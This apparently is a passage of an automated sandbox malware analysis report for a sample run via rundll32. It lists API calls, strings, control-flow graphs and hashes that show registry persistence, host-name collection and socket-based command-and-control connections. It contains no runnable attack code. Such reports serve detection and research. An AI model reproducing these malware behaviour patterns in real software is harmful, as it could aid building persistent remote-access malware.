                    • CloseHandle.KERNEL32(?), ref: 04EC473A
                    • GetTickCount.KERNEL32 ref: 04EC485C
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: CountEventTick$Sleep$Create$CancelCloseCriticalExchangeHandleInitializeInterlockedResetSectionStartup__time64_memset_strncpyclosesocketsetsockoptsocket
                    • String ID:
                    • API String ID: 2471061221-0
                    • Opcode ID: aee59a563fdb447781676877b038f5b93d844ddec5215762f7787abdc1fad594
                    • Instruction ID: cd6ee99d21b3d75805c59338ffedcf057e15932d079bbf868a01782c93044e34
                    • Opcode Fuzzy Hash: aee59a563fdb447781676877b038f5b93d844ddec5215762f7787abdc1fad594
                    • Instruction Fuzzy Hash: 39819CB25083819FD325DF25D985BDFB7E4FF88708F00492DE69997280DB74A906CB92

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 672 4ec4b70-4ec4c0d LoadLibraryA GetProcAddress * 6 673 4ec4cce-4ec4cd5 call 4ec4d00 672->673 674 4ec4c13 672->674 681 4ec4cda-4ec4cdc 673->681 675 4ec4c9f-4ec4cb6 674->675 676 4ec4c79-4ec4c90 674->676 677 4ec4c1a-4ec4c3c RegCreateKeyExA 674->677 678 4ec4c42-4ec4c59 RegOpenKeyExA 674->678 675->673 689 4ec4cb8-4ec4cbf 675->689 676->673 688 4ec4c92-4ec4c9d 676->688 677->673 677->678 678->673 680 4ec4c5b-4ec4c77 lstrlenA RegSetValueExA 678->680 682 4ec4cc3-4ec4cc5 680->682 683 4ec4cde-4ec4cdf FreeLibrary 681->683 684 4ec4ce5-4ec4cf9 681->684 682->673 687 4ec4cc7 682->687 683->684 687->673 688->682 689->682
                    APIs
                    • LoadLibraryA.KERNEL32(ADVAPI32.dll,1CA2304D,Time,?,00000000,00000000,04EB5D40,04ECCB10), ref: 04EC4BAC
                    • GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 04EC4BC3
                    • GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 04EC4BCE
                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 04EC4BD9
                    • GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 04EC4BE4
                    • GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 04EC4BEF
                    • GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 04EC4BF9
                    • RegCreateKeyExA.KERNEL32(?,?,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 04EC4C37
                    • RegOpenKeyExA.KERNEL32(?,?,00000000,0002001F,?), ref: 04EC4C55
                    • lstrlenA.KERNEL32(80000001), ref: 04EC4C5F
                    • RegSetValueExA.KERNEL32(?,?,00000000,00000001,80000001,00000001), ref: 04EC4C74
                    • FreeLibrary.KERNEL32(00000000), ref: 04EC4CDF
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: AddressProc$Library$CreateFreeLoadOpenValuelstrlen
                    • String ID: ADVAPI32.dll$RegCloseKey$RegCreateKeyExA$RegDeleteKeyA$RegDeleteValueA$RegOpenKeyExA$RegSetValueExA$Time
                    • API String ID: 3458221994-4066504548
                    • Opcode ID: 21c1f66887b79f6a88273f93131bc02c9d6695896cb5c86bdc7c851659bf0d39
                    • Instruction ID: b34f41051d0f78e26fec20cddfb6489eae38c33a433c53302fcc59759c787807
                    • Opcode Fuzzy Hash: 21c1f66887b79f6a88273f93131bc02c9d6695896cb5c86bdc7c851659bf0d39
                    • Instruction Fuzzy Hash: 97416B71A00218BBEB14DFA5DD85FEFB7B8EF48700F108619FA14E7291D774A8028B60

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 691 6d00c170-6d00c18c 692 6d00c18e-6d00c19f WSAStartup 691->692 693 6d00c1cf-6d00c1d6 call 6d03b7e0 691->693 695 6d00c1a1-6d00c1a6 692->695 696 6d00c1b5-6d00c1ce call 6d0489c0 692->696 702 6d00c34c-6d00c360 call 6d0489c0 693->702 703 6d00c1dc-6d00c1ef GetModuleHandleA 693->703 699 6d00c1a8-6d00c1ad 695->699 700 6d00c1af WSACleanup 695->700 699->693 699->700 700->696 704 6d00c1f1-6d00c1f7 703->704 705 6d00c1fc-6d00c222 GetProcAddress call 6d05a0e0 703->705 708 6d00c322-6d00c34b call 6d03b400 QueryPerformanceFrequency 704->708 712 6d00c224-6d00c226 705->712 713 6d00c24c-6d00c24e 705->713 708->702 717 6d00c228-6d00c235 712->717 718 6d00c23a-6d00c247 LoadLibraryA 712->718 715 6d00c250-6d00c25a GetProcAddress 713->715 716 6d00c271-6d00c27f GetSystemDirectoryA 713->716 715->716 719 6d00c25c-6d00c26c LoadLibraryExA 715->719 720 6d00c281-6d00c292 716->720 721 6d00c2ff 716->721 722 6d00c305-6d00c30d 717->722 718->722 719->722 728 6d00c294-6d00c29e GetSystemDirectoryA 720->728 729 6d00c2f5-6d00c2fc 720->729 721->722 723 6d00c320-6d00c321 722->723 724 6d00c30f-6d00c319 GetProcAddress 722->724 723->708 724->723 727 6d00c31b 724->727 727->723 728->729 730 6d00c2a0-6d00c2a2 728->730 729->721 732 6d00c2a5-6d00c2aa 730->732 732->732 733 6d00c2ac-6d00c2bc 732->733 734 6d00c2c0-6d00c2c5 733->734 734->734 735 6d00c2c7-6d00c2d0 734->735 736 6d00c2d2-6d00c2dd 735->736 736->736 737 6d00c2df-6d00c2e1 736->737 738 6d00c2e3-6d00c2ea 737->738 739 6d00c2ec-6d00c2ed LoadLibraryA 737->739 740 6d00c2f3 738->740 739->740 740->729
                    APIs
                    • WSAStartup.WS2_32(00000202,93BD9D6B), ref: 6D00C197
                    • WSACleanup.WS2_32 ref: 6D00C1AF
                    • GetModuleHandleA.KERNEL32(kernel32,00000000,00000000), ref: 6D00C1E5
                    • GetProcAddress.KERNEL32(00000000,LoadLibraryExA), ref: 6D00C20A
                    • _strpbrk.LIBCMT ref: 6D00C218
                    • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 6D00C23F
                    • GetProcAddress.KERNEL32(00000000,AddDllDirectory), ref: 6D00C256
                    • LoadLibraryExA.KERNEL32(iphlpapi.dll,00000000,00000800), ref: 6D00C268
                    • GetSystemDirectoryA.KERNEL32(00000000,00000000), ref: 6D00C275
                    • GetSystemDirectoryA.KERNEL32(00000000,00000000), ref: 6D00C296
                    • LoadLibraryA.KERNEL32(00000000), ref: 6D00C2ED
                    • GetProcAddress.KERNEL32(00000000,if_nametoindex), ref: 6D00C315
                    • QueryPerformanceFrequency.KERNEL32(6D08B078), ref: 6D00C342
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc$DirectorySystem$CleanupFrequencyHandleModulePerformanceQueryStartup_strpbrk
                    • String ID: AddDllDirectory$LoadLibraryExA$if_nametoindex$iphlpapi.dll$kernel32$pGo
                    • API String ID: 596066106-870381569
                    • Opcode ID: feb2002201515f92fc9a59738cbea04dda5a1647d4dbd53e4f6564c80309ad3a
                    • Instruction ID: 3240094a6f10fd7896925b312bf98c2bee92e47904703ae66211ecdba61851b7
                    • Opcode Fuzzy Hash: feb2002201515f92fc9a59738cbea04dda5a1647d4dbd53e4f6564c80309ad3a
                    • Instruction Fuzzy Hash: AC512535148346BBFF215FB58C55B7E36B8AF47704F144228E949AB282EB229406867D

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 782 6d036c70-6d036cd2 call 6cffeec0 call 6d0372b0 787 6d036f81-6d036f87 782->787 788 6d036cd8-6d036ce9 call 6d037180 782->788 789 6d037030-6d03704a call 6d0489c0 787->789 790 6d036f8d-6d036f9a 787->790 788->787 800 6d036cef-6d036d1d call 6d00a450 788->800 793 6d037022-6d037023 closesocket 790->793 794 6d036fa0-6d036fa6 790->794 796 6d037029 793->796 798 6d03701a-6d03701f call 6cff98f0 794->798 799 6d036fa8-6d036fcd call 6cff98f0 call 6cff9b90 * 2 794->799 796->789 798->793 799->796 807 6d036d24-6d036d28 800->807 808 6d036d1f-6d036d22 800->808 810 6d036d90 807->810 811 6d036d2a-6d036d3b 807->811 808->807 808->810 813 6d036d95-6d036dbb 810->813 811->813 814 6d036d3d-6d036d5f setsockopt 811->814 816 6d036de9-6d036dec 813->816 817 6d036dbd-6d036dcf call 6d03b400 813->817 814->813 815 6d036d61-6d036d8e WSAGetLastError call 6d01a850 call 6d00a450 814->815 815->813 820 6d036e35-6d036e3a 816->820 821 6d036dee-6d036e0e getsockopt 816->821 835 6d036dd1-6d036ddb 817->835 836 6d036ddd-6d036de7 817->836 827 6d036e40-6d036e47 820->827 828 6d036efd-6d036f04 820->828 825 6d036e10-6d036e18 821->825 826 6d036e1a-6d036e2f setsockopt 821->826 825->820 825->826 826->820 827->828 833 6d036e4d-6d036e6f setsockopt 827->833 831 6d036f42-6d036f48 828->831 832 6d036f06-6d036f37 call 6cff9b90 * 2 828->832 841 6d036f53-6d036f77 call 6d044b40 call 6d036760 831->841 842 6d036f4a-6d036f4d 831->842 868 6d036fcf-6d036fd1 832->868 869 6d036f3d 832->869 838 6d036e82-6d036ee1 call 6d00bdd0 * 2 WSAIoctl 833->838 839 6d036e71-6d036e80 call 6d00a450 833->839 835->820 836->821 855 6d036ef9 838->855 861 6d036ee3-6d036ef6 WSAGetLastError call 6d00a450 838->861 839->855 847 6d036fde-6d036ff0 call 6d03efa0 841->847 862 6d036f79-6d036f7c 841->862 842->841 842->847 847->789 858 6d036ff2-6d037018 call 6d037050 call 6cffeec0 847->858 855->828 858->789 861->855 862->787 866 6d036f7e 862->866 866->787 868->831 871 6d036fd7-6d036fdc 868->871 869->831 871->787
                    APIs
                      • Part of subcall function 6CFFEEC0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,6CFF9E6C,?,00000000,00000000,00000008,6CFF1FE0,00000000), ref: 6CFFEED3
                      • Part of subcall function 6CFFEEC0: __alldvrm.LIBCMT ref: 6CFFEEED
                      • Part of subcall function 6CFFEEC0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CFFEF14
                    • setsockopt.WS2_32(000000FF,00000006,00000001,?,00000004), ref: 6D036D57
                    • WSAGetLastError.WS2_32(?,00000100), ref: 6D036D6B
                    • getsockopt.WS2_32(?,0000FFFF,00001001,00000004,00000004), ref: 6D036E06
                    • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 6D036E2F
                    • setsockopt.WS2_32(?,0000FFFF,00000008,00000000,00000004), ref: 6D036E67
                    • WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 6D036ED9
                    • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 6D036EE3
                    • closesocket.WS2_32(?), ref: 6D037023
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: setsockopt$ErrorLast$CounterIoctlPerformanceQueryUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@closesocketgetsockopt
                    • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$Could not set TCP_NODELAY: %s$Failed to set SIO_KEEPALIVE_VALS on fd %d: %d$Failed to set SO_KEEPALIVE on fd %d
                    • API String ID: 3592965920-1855857570
                    • Opcode ID: 9e7d088e5060f30b19d1d9a9139c4b2862951b9d5a1bb81414f7b8bf75f74f1b
                    • Instruction ID: c5cd88763b7c84418be662ca878b8158aedbe9390b77de88f0a146c31e24499a
                    • Opcode Fuzzy Hash: 9e7d088e5060f30b19d1d9a9139c4b2862951b9d5a1bb81414f7b8bf75f74f1b
                    • Instruction Fuzzy Hash: 2FB1B171908312AFF711CF24CC80FAB77E9AF85308F450529FA989B291D771D648CBA2

                    Control-flow Graph

                    APIs
                    • GetModuleHandleA.KERNEL32(kernel32,00000000,?,secur32.dll,6D03B80D,secur32.dll,00000004,00000000,00000000,00000002,00000002,6D00C1D4), ref: 6D00C02A
                    • GetProcAddress.KERNEL32(00000000,LoadLibraryExA), ref: 6D00C042
                    • _strpbrk.LIBCMT ref: 6D00C054
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: AddressHandleModuleProc_strpbrk
                    • String ID: AddDllDirectory$LoadLibraryExA$kernel32$secur32.dll
                    • API String ID: 1657965159-2329295995
                    • Opcode ID: 2e74c1dc465142f2b3be6536aad770a83bfe3a47c59b09e158ccf5620552cdec
                    • Instruction ID: a6cae1f38ea3550d16108771c80cdd5b3f4bfaf118861bb73d5390c3d4158d8b
                    • Opcode Fuzzy Hash: 2e74c1dc465142f2b3be6536aad770a83bfe3a47c59b09e158ccf5620552cdec
                    • Instruction Fuzzy Hash: A6311A773083056BFB141F79AC44BBA77B9EF83267F248179E54697242DF23900A8678

                    Control-flow Graph

                    APIs
                      • Part of subcall function 04EC7200: setsockopt.WS2_32(?,0000FFFF,00000080,04ECCA88,00000004), ref: 04EC7222
                      • Part of subcall function 04EC7200: CancelIo.KERNEL32(?,?,?,04EC79B2,?), ref: 04EC722F
                      • Part of subcall function 04EC7200: InterlockedExchange.KERNEL32(?,00000000), ref: 04EC723E
                      • Part of subcall function 04EC7200: closesocket.WS2_32(?), ref: 04EC724B
                      • Part of subcall function 04EC7200: SetEvent.KERNEL32(?,?,?,04EC79B2,?), ref: 04EC7258
                    • ResetEvent.KERNEL32(?,762323A0,?,?), ref: 04EC7BB3
                    • socket.WS2_32 ref: 04EC7BC6
                    • gethostbyname.WS2_32(?), ref: 04EC7BED
                    • htons.WS2_32(?), ref: 04EC7C06
                    • inet_ntoa.WS2_32(?), ref: 04EC7C21
                    • _wprintf.LIBCMT ref: 04EC7C29
                    • connect.WS2_32(?,?,00000010), ref: 04EC7C3E
                    • getsockname.WS2_32(?,?,?), ref: 04EC7C6D
                    • _memset.LIBCMT ref: 04EC7C7E
                    • inet_ntoa.WS2_32(?), ref: 04EC7C8A
                    • wsprintfA.USER32 ref: 04EC7C8E
                    • setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 04EC7CB3
                    • WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 04EC7CE8
                    • CreateThread.KERNEL32 ref: 04EC7D03
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: Eventinet_ntoasetsockopt$CancelCreateExchangeInterlockedIoctlResetThread_memset_wprintfclosesocketconnectgethostbynamegetsocknamehtonssocketwsprintf
                    • String ID:
                    • API String ID: 628104682-0
                    • Opcode ID: 31430b452370093efa803e9eaed33211a051dc29516eeae7ae7191fe8c71086b
                    • Instruction ID: 5440a69b64031ea77e64c2320c2cf522bf19fb31d181b4753293a6653c06bbeb
                    • Opcode Fuzzy Hash: 31430b452370093efa803e9eaed33211a051dc29516eeae7ae7191fe8c71086b
                    • Instruction Fuzzy Hash: 1D419BB1A00304AFE710DBA8EC85FEAB7B9EF48315F004529F656E7280DB746905CBA1

                    Control-flow Graph

                    APIs
                      • Part of subcall function 04EC5140: _memset.LIBCMT ref: 04EC515F
                      • Part of subcall function 04EC5140: _memset.LIBCMT ref: 04EC5179
                      • Part of subcall function 04EC5140: GetComputerNameA.KERNEL32(00000000,?), ref: 04EC5199
                      • Part of subcall function 04EC5140: lstrcpyA.KERNEL32(00000000,UnKnow), ref: 04EC51AF
                      • Part of subcall function 04EC5140: _memset.LIBCMT ref: 04EC51C3
                      • Part of subcall function 04EC5140: wsprintfA.USER32 ref: 04EC51DB
                    • _memset.LIBCMT ref: 04EC68C6
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,Time), ref: 04EC68DC
                    • _strrchr.LIBCMT ref: 04EC68EB
                    • _strtok.LIBCMT ref: 04EC68F9
                    • wsprintfA.USER32 ref: 04EC6925
                    • CreateThread.KERNEL32(00000000,00000000,04EC6200,00000000,00000000,00000000), ref: 04EC698F
                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,Time), ref: 04EC6996
                    • _strtok.LIBCMT ref: 04EC69AA
                    • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,Time), ref: 04EC69C1
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: _memset$Name_strtokwsprintf$CloseComputerCreateFileHandleModuleSleepThread_strrchrlstrcpy
                    • String ID: %s\%s$ARPD$Time
                    • API String ID: 2842694341-2065597383
                    • Opcode ID: f7eb1adc153925229c31fb4eed8910df0b35926a80a9fe57376e936ba9cf4196
                    • Instruction ID: dd9253770c964d44514236ee174fb53df2edf044c547160d92696feb2513754b
                    • Opcode Fuzzy Hash: f7eb1adc153925229c31fb4eed8910df0b35926a80a9fe57376e936ba9cf4196
                    • Instruction Fuzzy Hash: 07313971940314AFEB10A730DD46FDB77A8DF44705F0451D8EA89AB281DAB4BA46CFE1

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 962 6d01f9e0-6d01fa2b call 6d003a00 965 6d01fa31-6d01fa35 962->965 966 6d01fd1f 962->966 965->966 968 6d01fa3b-6d01fa3f 965->968 967 6d01fd24-6d01fd3c call 6d0489c0 966->967 970 6d01fa41-6d01fa62 968->970 971 6d01fa68-6d01fa6d 968->971 970->971 980 6d01ffcb-6d01ffde call 6d00a380 970->980 973 6d01fa97-6d01faa4 971->973 974 6d01fa6f-6d01fa91 971->974 976 6d01faa6-6d01fab9 973->976 977 6d01fad9-6d01fade 973->977 974->973 974->980 986 6d01fad3-6d01fad6 976->986 987 6d01fabb-6d01face call 6d00a380 976->987 978 6d01fae0-6d01fb06 call 6d009b60 977->978 979 6d01fb22-6d01fbda call 6d00bde0 977->979 992 6d01fd3d-6d01fd45 978->992 993 6d01fb0c-6d01fb0e 978->993 979->980 1000 6d01fbe0-6d01fc1d call 6d04a3d0 979->1000 980->967 986->977 987->967 996 6d01fd47 992->996 997 6d01fd4e-6d01fd50 992->997 998 6d01fd11-6d01fd1c call 6d00a380 993->998 999 6d01fb14-6d01fb16 993->999 996->997 997->967 998->966 999->998 1001 6d01fb1c-6d01fb1f 999->1001 1006 6d01fc20-6d01fc41 1000->1006 1001->979 1008 6d01ffb5 1006->1008 1009 6d01fc47-6d01fc4d 1006->1009 1010 6d01ffb9-6d01ffc6 1008->1010 1011 6d01fc53-6d01fc59 1009->1011 1012 6d01ff09-6d01ff0e 1009->1012 1010->967 1013 6d01fc63-6d01fc69 1011->1013 1014 6d01fc5b-6d01fc5d 1011->1014 1015 6d01ff14-6d01ff2e call 6d01a1f0 1012->1015 1016 6d01ff9b-6d01ffb0 1012->1016 1017 6d01fc70-6d01fc74 1013->1017 1014->1013 1014->1015 1022 6d01ff30-6d01ff36 1015->1022 1023 6d01ff83-6d01ff96 call 6d00a380 1015->1023 1016->967 1020 6d01fc76-6d01fc7a 1017->1020 1021 6d01fcaa-6d01fcaf 1017->1021 1020->1021 1026 6d01fc7c-6d01fc9c call 6d009b90 1020->1026 1024 6d01fcb1-6d01fcb7 1021->1024 1025 6d01fcbc-6d01fcc3 1021->1025 1028 6d01ff38-6d01ff3e 1022->1028 1029 6d01ff6b-6d01ff7e call 6d00a380 1022->1029 1023->967 1024->1025 1025->1017 1030 6d01fcc5-6d01fcca 1025->1030 1039 6d01fd52-6d01fd68 call 6d00a380 1026->1039 1040 6d01fca2-6d01fca4 1026->1040 1033 6d01ff40-6d01ff4e call 6d00a380 1028->1033 1034 6d01ff53-6d01ff66 call 6d00a380 1028->1034 1029->967 1035 6d01fcd0-6d01fcd6 1030->1035 1036 6d01fd6a 1030->1036 1033->966 1034->967 1035->1036 1043 6d01fcdc-6d01fce1 1035->1043 1045 6d01fd71-6d01fd7a 1036->1045 1039->966 1040->1021 1040->1039 1043->1045 1049 6d01fce7-6d01fd09 call 6d04a3d0 1043->1049 1045->1010 1050 6d01fd80-6d01fd82 1045->1050 1049->979 1058 6d01fd0f 1049->1058 1053 6d01fd84-6d01fd88 1050->1053 1054 6d01fd8f-6d01fd9e call 6d003a20 1050->1054 1053->1054 1059 6d01fda0-6d01fda6 1054->1059 1060 6d01fda8 1054->1060 1058->1050 1061 6d01fdae-6d01fdb4 1059->1061 1060->1061 1062 6d01fee2-6d01feea 1061->1062 1063 6d01fdba-6d01fde3 1061->1063 1062->997 1064 6d01fef0-6d01fef4 1062->1064 1067 6d01fe92-6d01feb1 call 6d01a1f0 call 6d00a380 1063->1067 1068 6d01fde9-6d01fdef 1063->1068 1064->997 1066 6d01fefa-6d01ff04 call 6d03efd0 1064->1066 1066->967 1083 6d01feb4 1067->1083 1068->1067 1070 6d01fdf5-6d01fdf8 1068->1070 1073 6d01feb8-6d01feba 1070->1073 1074 6d01fdfe-6d01fe07 1070->1074 1076 6d01fec3-6d01fec9 1073->1076 1077 6d01febc-6d01febd CertFreeCertificateContext 1073->1077 1074->1073 1078 6d01fe0d-6d01fe3b call 6d04a960 call 6d041490 1074->1078 1076->1062 1081 6d01fecb-6d01fedd call 6d00a380 1076->1081 1077->1076 1089 6d01fe78-6d01fe7c 1078->1089 1090 6d01fe3d-6d01fe46 1078->1090 1081->967 1083->1073 1089->1083 1091 6d01fe48-6d01fe51 1090->1091 1092 6d01fe7e-6d01fe90 call 6d00a380 1090->1092 1091->1092 1093 6d01fe53-6d01fe68 call 6d003340 1091->1093 1092->1083 1093->1089 1098 6d01fe6a-6d01fe75 call 6d00a380 1093->1098 1098->1089
                    APIs
                    • CertFreeCertificateContext.CRYPT32(?), ref: 6D01FEBD
                    Strings
                    • schannel: next InitializeSecurityContext failed: %s, xrefs: 6D01FF40, 6D01FF83
                    • schannel: %s, xrefs: 6D01FF53
                    • SSL: public key does not match pinned public key, xrefs: 6D01FE6A, 6D01FECB
                    • schannel: unable to re-allocate memory, xrefs: 6D01FABB
                    • SSL: failed retrieving public key from server certificate, xrefs: 6D01FE7E
                    • schannel: failed to send next handshake data: sent %zd of %lu bytes, xrefs: 6D01FD5A
                    • schannel: Failed to read remote certificate context: %s, xrefs: 6D01FEA6
                    • schannel: SNI or certificate check failed: %s, xrefs: 6D01FF6B
                    • schannel: failed to receive handshake, SSL/TLS connection failed, xrefs: 6D01FD11
                    • schannel: unable to allocate memory, xrefs: 6D01FFCB
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: CertCertificateContextFree
                    • String ID: SSL: failed retrieving public key from server certificate$SSL: public key does not match pinned public key$schannel: %s$schannel: Failed to read remote certificate context: %s$schannel: SNI or certificate check failed: %s$schannel: failed to receive handshake, SSL/TLS connection failed$schannel: failed to send next handshake data: sent %zd of %lu bytes$schannel: next InitializeSecurityContext failed: %s$schannel: unable to allocate memory$schannel: unable to re-allocate memory
                    • API String ID: 3080675121-413892695
                    • Opcode ID: fca1959a9b06f4ef97ecdfa88600b0f139dbb02044384d868f9661c006e756d3
                    • Instruction ID: 5da8d36f389f1ed6897fa587fbfba541d72f9653375a62f63ebdc651b8bc6f02
                    • Opcode Fuzzy Hash: fca1959a9b06f4ef97ecdfa88600b0f139dbb02044384d868f9661c006e756d3
                    • Instruction Fuzzy Hash: 39F18CB2908301AFFB10CF58CC84B6A7BE9BF85308F51446CF9599B242D775E948CB92
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: _memset$ComputerNamelstrcpylstrlenwsprintf
                    • String ID: SOFTWARE\%s\$Time$UnKnow
                    • API String ID: 3529005902-722125974
                    • Opcode ID: fc0dfc3045c4f6653ec395b53e215e63b179edc94c5a7346951c1d21357a4b23
                    • Instruction ID: 3cd7f212668717ff10c3b91b8852323520ff071aefec51c4d97156dac881d409
                    • Opcode Fuzzy Hash: fc0dfc3045c4f6653ec395b53e215e63b179edc94c5a7346951c1d21357a4b23
                    • Instruction Fuzzy Hash: 071191F1940218AFE724EBA4DD4AFDA737CEF44705F004098E609A6082EA756B55CBA0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
